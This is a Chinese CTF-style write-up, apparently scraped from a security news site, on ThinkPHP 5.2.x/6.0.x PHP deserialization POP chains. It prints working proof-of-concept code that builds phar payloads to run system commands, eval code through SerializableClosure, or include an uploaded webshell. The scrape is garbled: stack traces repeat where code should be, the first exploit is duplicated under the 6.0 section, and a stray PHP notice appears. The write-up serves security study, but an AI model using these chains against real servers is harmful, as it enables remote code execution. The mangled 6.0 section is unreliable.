Thinkphp 利用链 – 安全客,安全资讯平台 | xxxThinkphp 利用链 – 安全客,安全资讯平台 – xxx
菜单

Thinkphp 利用链 – 安全客,安全资讯平台

九月 30, 2019 - 安全客

Thinkphp 利用链 - 安全客,安全资讯平台

 

背景

在N1CTF中,Smi1e师傅出了一道thinkphp的反序列化链挖掘的题目,当时没有做出来,赛后复盘各位师傅的利用链学习总结。

 

安装

使用composer来部署环境

composer create-project topthink/think=5.2.x-dev v5.2 composer create-project topthink/think=6.0.x-dev v6.0

 

正文

一般来说,反序列化的入口为

__destruct析构函数会在到某个对象的所有引用都被删除或者当对象被显式销毁时执行

__wakeupunserialize()执行前会检查是否存在一个__wakeup()方法,如果存在会先调用

__toString 当一个对象被反序列化后又被当做字符串使用

 

总的调用过程:

Attribute.php:480, think/model/Pivot->getValue() Attribute.php:457, think/model/Pivot->getAttr() Conversion.php:173, think/model/Pivot->toArray() Conversion.php:252, think/model/Pivot->toJson() Conversion.php:268, think/model/Pivot->__toString() Windows.php:163, file_exists() Windows.php:163, think/process/pipes/Windows->removeFiles() Windows.php:59, think/process/pipes/Windows->__destruct()

最后在getValue()处进行可变函数调用导致RCE

5.2.x (一)

根据Smi1e师傅的POC

<?php namespace think/process/pipes {     class Windows     {         private $files;         public function __construct($files)         {             $this->files = array($files);         }     } }  namespace think/model/concern {     trait Conversion     {         protected $append = array("Smi1e" => "1");     }      trait Attribute     {         private $data;         private $withAttr = array("Smi1e" => "system");          public function get($system)         {             $this->data = array("Smi1e" => "$system");         }     } } namespace think {     abstract class Model     {         use model/concern/Attribute;         use model/concern/Conversion;     } }  namespace think/model{     use think/Model;     class Pivot extends Model     {         public function __construct($system)         {             $this->get($system);         }     } }  namespace {     $Conver = new think/model/Pivot("ls");     $payload = new think/process/pipes/Windows($Conver);     @unlink("phar3.phar");     $phar = new Phar("phar3.phar"); //后缀名必须为phar     $phar->startBuffering();     $phar->setStub("GIF89a<?php __HALT_COMPILER(); ?>"); //设置stub     $phar->setMetadata($payload); //将自定义的meta-data存入manifest     $phar->addFromString("test.txt", "test"); //添加要压缩的文件     //签名自动计算     $phar->stopBuffering();     echo urlencode(serialize($payload)); } ?>

调试环境:

tp5.2.0rc1 php7.3 xdebug2.7.0

调试过程:

首先根据POC生成phar文件,放入public目录,在index.php中增加以下语句来触发反序列化,关于什么方法可以触发反序列化可以参考以下两篇文章,讲得很详细了,由于复现的时候题目环境已经关闭因此在这里我是自己构造的反序列化触发,预期解是通过Rogue Mysql Server让其执行LOAD DATA LOCAL INFILE语句即可触发phar反序列化。

https://xz.aliyun.com/t/2958 https://paper.seebug.org/998/ https://xz.aliyun.com/t/6057#toc-6

Thinkphp 利用链 - 安全客,安全资讯平台

首先进入

Windows.php:59, think/process/pipes/Windows->__destruct()

Thinkphp 利用链 - 安全客,安全资讯平台

调用removeFiles()方法

Windows.php:163, think/process/pipes/Windows->removeFiles()

Thinkphp 利用链 - 安全客,安全资讯平台

因为$this->files是Windows类中的一个private变量,我们可以通过重写Windows的__construct函数来控制该参数

调用file_exists()方法

Windows.php:163, file_exists()

此处使用file_exists来判断$filename是否存在,在file_exists中,$filename会被当作string类型处理。

Thinkphp 利用链 - 安全客,安全资讯平台

如果我们构造的Windows类中的$files为一个包含__toString()方法的对象,该__toString()方法将会被调用。

调用__toString()方法

Conversion.php:268, think/model/Pivot->__toString()

Thinkphp 利用链 - 安全客,安全资讯平台

调用toJson()方法

Conversion.php:252, think/model/Pivot->toJson()

Thinkphp 利用链 - 安全客,安全资讯平台

调用toArray()方法

Conversion.php:129, think/model/Pivot->toArray()

Thinkphp 利用链 - 安全客,安全资讯平台

其中$this->data和$this->relation都是数组类型,通过

Thinkphp 利用链 - 安全客,安全资讯平台

array_merge以后得到$data为

Thinkphp 利用链 - 安全客,安全资讯平台

Thinkphp 利用链 - 安全客,安全资讯平台

$item[$key]的值为getAttr($key)的值

调用getAttr()方法

Attribute.php:450, think/model/Pivot->getAttr()

Thinkphp 利用链 - 安全客,安全资讯平台

$value的值通过getData($name)也就是getData(“Smile”)

调用getData()方法

Attribute.php:268, think/model/Pivot->getData()

Thinkphp 利用链 - 安全客,安全资讯平台

调用getRealFieldName方法

Attribute.php:179, think/model/Pivot->getRealFieldName()

Thinkphp 利用链 - 安全客,安全资讯平台

Thinkphp 利用链 - 安全客,安全资讯平台

$this->strict为判断是否严格字段大小写的标志,默认为true

因此getRealFieldName默认返回$name参数的值

Thinkphp 利用链 - 安全客,安全资讯平台

Thinkphp 利用链 - 安全客,安全资讯平台

如果$this->data存在$fieldName键名,则返回对应的键值,此处为”ls”

Thinkphp 利用链 - 安全客,安全资讯平台

调用getValue()

Attribute.php:472, think/model/Pivot->getValue()

Thinkphp 利用链 - 安全客,安全资讯平台

withAttr的值是可控的

trait Attribute     {         private $data;         private $withAttr = array("Smi1e" => "system");          public function get($system)         {             $this->data = array("Smi1e" => "$system");         }     }

Thinkphp 利用链 - 安全客,安全资讯平台

因此$closure的值可控,设置为system

然后进行可变函数调用

system ( string $command [, int &$return_var ] ) : string

验证一下:

Thinkphp 利用链 - 安全客,安全资讯平台

结果验证:

 

Thinkphp 利用链 - 安全客,安全资讯平台

$closure = $this->withAttr[$fieldName]; $value   = $closure($value, $this->data);

 

第一个POC需要寻找一个可以接受两个参数的php函数比如system,而且需要想办法去控制这两个参数

5.2.x (二)

<?php  namespace think/process/pipes {     class Windows{         private $files = [];         function __construct($files)         {             $this->files = $files;         }     } }  namespace think/model/concern {     trait Conversion{         protected $visible;     }     trait RelationShip{         private $relation;     }     trait Attribute{         private $withAttr;         private $data;     } }  namespace think {     abstract class Model{         use model/concern/RelationShip;         use model/concern/Conversion;         use model/concern/Attribute;         function __construct($closure)         {             $this->data = array("wh1t3p1g"=>[]);             $this->relation = array("wh1t3p1g"=>[]);             $this->visible= array("wh1t3p1g"=>[]);             $this->withAttr = array("wh1t3p1g"=>$closure);         }     } }  namespace think/model {     class Pivot extends /think/Model{         function __construct($closure)         {             parent::__construct($closure);         }     } }  namespace {     require __DIR__ . '/../vendor/autoload.php';     $code = 'phpinfo();';     $func = function () use ($code) {eval($code);};     $closure = new /Opis/Closure/SerializableClosure($func);     $pivot = new /think/model/Pivot($closure);     $windows = new /think/process/pipes/Windows([$pivot]);     @unlink("phar4.phar");     $phar = new Phar("phar4.phar"); //后缀名必须为phar     $phar->startBuffering();     $phar->setStub("GIF89a<?php __HALT_COMPILER(); ?>"); //设置stub     $phar->setMetadata($windows); //将自定义的meta-data存入manifest     $phar->addFromString("test.txt", "test"); //添加要压缩的文件     //签名自动计算     $phar->stopBuffering();     echo urlencode(serialize($windows)); } ?>

这个POC是wh1t3p1g师傅找到的,跟第一个链的调用链其实是一样的

SerializableClosure.php:109, Opis/Closure/SerializableClosure->__invoke() Attribute.php:481, think/model/Pivot->getValue() Attribute.php:457, think/model/Pivot->getAttr() Conversion.php:171, think/model/Pivot->toArray() Conversion.php:252, think/model/Pivot->toJson() Conversion.php:268, think/model/Pivot->__toString() Windows.php:163, file_exists() Windows.php:163, think/process/pipes/Windows->removeFiles() Windows.php:59, think/process/pipes/Windows->__destruct()

不同的是这一POC使用vendor/opis/closure/src/SerializableClosure.php来构造可利用的匿名函数,避开特定参数的构造,/Opis/Closure可用于序列化匿名函数,使得匿名函数同样可以进行序列化操作。

在中有__invoke()函数并且里面有call_user_func函数,当尝试以调用函数的方式调用一个对象时,__invoke()方法会被自动调用。

Attribute.php:480, think/model/Pivot->getValue() Attribute.php:457, think/model/Pivot->getAttr() Conversion.php:173, think/model/Pivot->toArray() Conversion.php:252, think/model/Pivot->toJson() Conversion.php:268, think/model/Pivot->__toString() Windows.php:163, file_exists() Windows.php:163, think/process/pipes/Windows->removeFiles() Windows.php:59, think/process/pipes/Windows->__destruct()

0

这意味着我们可以序列化一个匿名函数,然后交由上述的$closure($value, $this->data)调用,将会触发SerializableClosure.php__invoke执行。

这个思路很赞!!!

 

5.2.x (三)

这个利用链在Attribute.php:472, think/model/Pivot->getValue()之前的利用链都是相同的,如果能另外的利用链可以顺着参考文章第三篇的思路进行发掘,寻找一个类满足以下2个条件

  1. 该类中没有”visible”方法
  2. 实现了__call方法

这样才可以触发__call方法,那么直接搜索关键字public function __call,因为一般PHP中的__call方法都是用来进行容错或者是动态调用,所以一般会在__call方法中使用

Attribute.php:480, think/model/Pivot->getValue() Attribute.php:457, think/model/Pivot->getAttr() Conversion.php:173, think/model/Pivot->toArray() Conversion.php:252, think/model/Pivot->toJson() Conversion.php:268, think/model/Pivot->__toString() Windows.php:163, file_exists() Windows.php:163, think/process/pipes/Windows->removeFiles() Windows.php:59, think/process/pipes/Windows->__destruct()

1

但是public function __call($method, $args)我们只能控制 $args,在参考文章三中找到了think-5.1.37/thinkphp/library/think/Request.php,但是5.2.x不适用,重新寻找

Thinkphp 利用链 - 安全客,安全资讯平台

 

/think/Db->__call()

在/think/Db.php中存在__call方法,其中会调用call_user_func_array来进行容错

$this->config$this->connection均可控,至此,我们可以实例化任意符合条件的类,比如

Attribute.php:480, think/model/Pivot->getValue() Attribute.php:457, think/model/Pivot->getAttr() Conversion.php:173, think/model/Pivot->toArray() Conversion.php:252, think/model/Pivot->toJson() Conversion.php:268, think/model/Pivot->__toString() Windows.php:163, file_exists() Windows.php:163, think/process/pipes/Windows->removeFiles() Windows.php:59, think/process/pipes/Windows->__destruct()

2

/think/Url

寻找一个存在漏洞的类

Attribute.php:480, think/model/Pivot->getValue() Attribute.php:457, think/model/Pivot->getAttr() Conversion.php:173, think/model/Pivot->toArray() Conversion.php:252, think/model/Pivot->toJson() Conversion.php:268, think/model/Pivot->__toString() Windows.php:163, file_exists() Windows.php:163, think/process/pipes/Windows->removeFiles() Windows.php:59, think/process/pipes/Windows->__destruct()

3

在/think/Url.php中该构造器引入了RuntimePath下的route.php文件,因为这道题是允许上传文件的,所以只要在可上传的目录下上传一个route.php的webshell即可。

$app为可控变量,直接修改$runtimePath的内容即可控制$app->getRuntimePath()的值

因此如下构造App对象

Attribute.php:480, think/model/Pivot->getValue() Attribute.php:457, think/model/Pivot->getAttr() Conversion.php:173, think/model/Pivot->toArray() Conversion.php:252, think/model/Pivot->toJson() Conversion.php:268, think/model/Pivot->__toString() Windows.php:163, file_exists() Windows.php:163, think/process/pipes/Windows->removeFiles() Windows.php:59, think/process/pipes/Windows->__destruct()

4

这个思路也很赞啊!!!!师傅们太强了。

  1. vendor/topthink/framework/src/think/process/pipes/Windows.php __destruct ->removeFiles ->file_exists 强制转化字符串filename,这里的filename可控 可触发__toString函数,下一步找可利用的__toString
  2. vendor/topthink/framework/src/think/model/concern/Conversion.php__toString -> toJson -> toArray->appendAttrToArray->$relation调用不存在的函数,触发__call
  3. vendor/topthink/framework/src/think/Db.php__call -> new $class($this->connection) 调用任意类的__construct函数
  4. vendor/topthink/framework/src/think/Url.php构造App类,达到include任意文件的效果

POC:

Attribute.php:480, think/model/Pivot->getValue() Attribute.php:457, think/model/Pivot->getAttr() Conversion.php:173, think/model/Pivot->toArray() Conversion.php:252, think/model/Pivot->toJson() Conversion.php:268, think/model/Pivot->__toString() Windows.php:163, file_exists() Windows.php:163, think/process/pipes/Windows->removeFiles() Windows.php:59, think/process/pipes/Windows->__destruct()

5

这个POC的利用限制较大,不过思路很赞

Attribute.php:480, think/model/Pivot->getValue() Attribute.php:457, think/model/Pivot->getAttr() Conversion.php:173, think/model/Pivot->toArray() Conversion.php:252, think/model/Pivot->toJson() Conversion.php:268, think/model/Pivot->__toString() Windows.php:163, file_exists() Windows.php:163, think/process/pipes/Windows->removeFiles() Windows.php:59, think/process/pipes/Windows->__destruct()

6

调试过程:

在调用toarray之前的步骤和前面两个POC的调用是一样的

Attribute.php:480, think/model/Pivot->getValue() Attribute.php:457, think/model/Pivot->getAttr() Conversion.php:173, think/model/Pivot->toArray() Conversion.php:252, think/model/Pivot->toJson() Conversion.php:268, think/model/Pivot->__toString() Windows.php:163, file_exists() Windows.php:163, think/process/pipes/Windows->removeFiles() Windows.php:59, think/process/pipes/Windows->__destruct()

7

之后开始调用appendAttrToArray()

Conversion.php:196, think/model/Pivot->appendAttrToArray()

Thinkphp 利用链 - 安全客,安全资讯平台

Conversion.php:196, think/Db->append()

Db对象尝试调用append方法,因为Db不存在append方法所以会触发__call()

Db.php:201, think/Db->__call()

Thinkphp 利用链 - 安全客,安全资讯平台

Attribute.php:480, think/model/Pivot->getValue() Attribute.php:457, think/model/Pivot->getAttr() Conversion.php:173, think/model/Pivot->toArray() Conversion.php:252, think/model/Pivot->toJson() Conversion.php:268, think/model/Pivot->__toString() Windows.php:163, file_exists() Windows.php:163, think/process/pipes/Windows->removeFiles() Windows.php:59, think/process/pipes/Windows->__destruct()

8

Url.php:44, think/Url->__construct()

Thinkphp 利用链 - 安全客,安全资讯平台

 

Thinkphp 利用链 - 安全客,安全资讯平台

 

6.0.x (四)

tp在v6.0.x取消了Windos类,但是前面的利用链的函数动态调用的反序列化链后半部分仍然可以使用,意思是得寻找新的起点,从__destruct__wakeup等等开始找起。

Attribute.php:480, think/model/Pivot->getValue() Attribute.php:457, think/model/Pivot->getAttr() Conversion.php:173, think/model/Pivot->toArray() Conversion.php:252, think/model/Pivot->toJson() Conversion.php:268, think/model/Pivot->__toString() Windows.php:163, file_exists() Windows.php:163, think/process/pipes/Windows->removeFiles() Windows.php:59, think/process/pipes/Windows->__destruct()

9

找一条可以触发toString的路径即可,在Model.php:503, think/model/Pivot->checkAllowFields()中

<?php namespace think/process/pipes {     class Windows     {         private $files;         public function __construct($files)         {             $this->files = array($files);         }     } }  namespace think/model/concern {     trait Conversion     {         protected $append = array("Smi1e" => "1");     }      trait Attribute     {         private $data;         private $withAttr = array("Smi1e" => "system");          public function get($system)         {             $this->data = array("Smi1e" => "$system");         }     } } namespace think {     abstract class Model     {         use model/concern/Attribute;         use model/concern/Conversion;     } }  namespace think/model{     use think/Model;     class Pivot extends Model     {         public function __construct($system)         {             $this->get($system);         }     } }  namespace {     $Conver = new think/model/Pivot("ls");     $payload = new think/process/pipes/Windows($Conver);     @unlink("phar3.phar");     $phar = new Phar("phar3.phar"); //后缀名必须为phar     $phar->startBuffering();     $phar->setStub("GIF89a<?php __HALT_COMPILER(); ?>"); //设置stub     $phar->setMetadata($payload); //将自定义的meta-data存入manifest     $phar->addFromString("test.txt", "test"); //添加要压缩的文件     //签名自动计算     $phar->stopBuffering();     echo urlencode(serialize($payload)); } ?>

0

调用链如下,可以看到只是前半部分的调用链不一样,后面的利用__toString做跳板的调用链是一样的,太强了思路

<?php namespace think/process/pipes {     class Windows     {         private $files;         public function __construct($files)         {             $this->files = array($files);         }     } }  namespace think/model/concern {     trait Conversion     {         protected $append = array("Smi1e" => "1");     }      trait Attribute     {         private $data;         private $withAttr = array("Smi1e" => "system");          public function get($system)         {             $this->data = array("Smi1e" => "$system");         }     } } namespace think {     abstract class Model     {         use model/concern/Attribute;         use model/concern/Conversion;     } }  namespace think/model{     use think/Model;     class Pivot extends Model     {         public function __construct($system)         {             $this->get($system);         }     } }  namespace {     $Conver = new think/model/Pivot("ls");     $payload = new think/process/pipes/Windows($Conver);     @unlink("phar3.phar");     $phar = new Phar("phar3.phar"); //后缀名必须为phar     $phar->startBuffering();     $phar->setStub("GIF89a<?php __HALT_COMPILER(); ?>"); //设置stub     $phar->setMetadata($payload); //将自定义的meta-data存入manifest     $phar->addFromString("test.txt", "test"); //添加要压缩的文件     //签名自动计算     $phar->stopBuffering();     echo urlencode(serialize($payload)); } ?>

1

Thinkphp 利用链 - 安全客,安全资讯平台

 

总结

有同学可能会疑问,找利用链之后怎么用呢,找到利用链只是一部分,还需要满足以下条件:

  1. 存在含有payload的phar文件,上传或者远程下载都可以。
  2. 存在反序列化的操作,这些操作不单单是unserialize还可以是文章中提到的包括LOAD DATA LOCAL INFILE等操作。

通过这四个POP的构造,也对thinkphp框架加深了理解,可以尝试尝试自己挖掘新的POP链~

 

参考

  1. https://github.com/Nu1LCTF/n1ctf-2019/tree/master/WEB/sql_manage
  2. https://github.com/opis/closure
  3. https://blog.riskivy.com/%E6%8C%96%E6%8E%98%E6%9A%97%E8%97%8Fthinkphp%E4%B8%AD%E7%9A%84%E5%8F%8D%E5%BA%8F%E5%88%97%E5%88%A9%E7%94%A8%E9%93%BE/?from=timeline&isappinstalled=0
  4. http://blog.0kami.cn/2019/09/10/thinkphp-6-0-x-%E5%8F%8D%E5%BA%8F%E5%88%97%E5%8C%96%E5%88%A9%E7%94%A8%E9%93%BE/

Notice: Undefined variable: canUpdate in /var/www/html/wordpress/wp-content/plugins/wp-autopost-pro/wp-autopost-function.php on line 51